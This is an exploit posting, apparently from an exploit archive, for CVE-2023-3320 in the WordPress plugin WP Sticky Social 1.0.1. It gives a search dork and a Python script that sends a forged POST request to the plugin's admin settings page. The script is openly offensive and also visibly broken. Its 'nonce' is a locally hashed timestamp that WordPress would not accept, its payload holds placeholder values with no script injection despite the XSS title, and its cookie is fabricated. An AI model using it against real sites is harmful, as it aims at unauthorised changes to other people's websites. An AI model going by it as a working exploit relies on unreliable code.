# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) # Dork: inurl:~/admin/views/admin.php # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social # Version: 1.0.1 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-3320 import requests import hashlib import time # Set the target URL url = "http://example.com/wp-admin/admin.php?page=wpss_settings" # Set the user agent string user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" # Generate the nonce value nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest() # Set the data payload payload = { "wpss_nonce": nonce, "wpss_setting_1": "value_1", "wpss_setting_2": "value_2", # Add additional settings as needed } # Set the request headers headers = { "User-Agent": user_agent, "Referer": url, "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983", # Add additional headers as needed } # Send the POST request response = requests.post(url, data=payload, headers=headers) # Check the response status code if response.status_code == 200: print("Request successful") else: print("Request failed")